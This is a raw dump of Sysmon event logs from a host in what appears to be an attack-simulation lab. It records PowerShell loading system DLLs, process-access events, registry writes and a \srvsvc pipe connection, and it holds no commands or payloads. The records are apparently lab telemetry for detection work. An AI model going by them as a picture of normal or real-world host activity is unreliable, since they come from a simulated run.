11241100x80000000000000001529978Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.484{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5C9J3NFXGAY8QJS8VTR6.temp2021-04-21 17:30:08.484 734700x80000000000000001529977Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001529976Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cscapi.dll10.0.14393.0 (rs1_release.160715-1616)Offline Files Win32 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcscapi.dllMD5=6433F8201BFB449DC6B47F6999C2F164,SHA256=06729F1E0A0596620B48B6DC4A2CC9CC5FE55B17BD488C71F7F15AA4262C8C14trueMicrosoft WindowsValid 18141800x80000000000000001529975Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388\srvsvcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001529974Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x80000000000000001529973Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001529972Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntshrui.dll10.0.14393.4169 (rs1_release.210107-1130)Shell extensions for sharingMicrosoft® Windows® Operating SystemMicrosoft Corporationntshrui.dllMD5=E996A5D4EA7754FF1B0411F0B1664603,SHA256=B2DA0AC549C551A2CAF0714EF3B344C33943292FB1FA9F2EEFA706B6FF18F1A2trueMicrosoft WindowsValid 10341000x80000000000000001529971Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.469{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529970Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\linkinfo.dll10.0.14393.0 (rs1_release.160715-1616)Windows Volume TrackingMicrosoft® Windows® Operating SystemMicrosoft CorporationLINKINFO.DLLMD5=4CE9B67A187310E37E535FC4165E0933,SHA256=469B33A5DDAA93D28F66AE6D6956268F6F2F09F146734D00A931FBDD1D87DE42trueMicrosoft WindowsValid 734700x80000000000000001529969Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\BCP47Langs.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)BCP47 Language ClassesMicrosoft® Windows® Operating SystemMicrosoft CorporationBCP47Lang.dllMD5=F688C2B9DD2EB56C3B0312B6380338AA,SHA256=B22DB210486D3B5F4EEB17900C5E7AA0EEFEDBB068A0C4858EFE9F8018C34628trueMicrosoft WindowsValid 734700x80000000000000001529968Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001529967Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\userenv.dll10.0.14393.3986 (rs1_release.201002-1707)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=047D26DCED07A10913C3E7C3A7502BED,SHA256=143C661F79AC6BB271452A10C2A19F6B1AAAAE43B4062B6CFF173F7D8ABC40FEtrueMicrosoft WindowsValid 734700x80000000000000001529966Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000001529965Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 734700x80000000000000001529964Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001529963Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001529962Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001529961Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001529960Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001529959Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.453{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 10341000x80000000000000001529958Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.451{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529957Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.451{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529956Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.451{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001529955Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.450{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 13241300x80000000000000001529954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC\VirtualDesktopBinary Data 12241200x80000000000000001529953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC 734700x80000000000000001529952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.447{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 13241300x80000000000000001529951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000120618\VirtualDesktopBinary Data 12241200x80000000000000001529950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000120618 734700x80000000000000001529949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x80000000000000001529948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001529947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001529946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001529945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001529944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001529943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001529942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001529941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001529940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001529939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x80000000000000001529938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001529937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001529936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001529935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001529934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 13241300x80000000000000001529933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001529932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 10341000x80000000000000001529931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 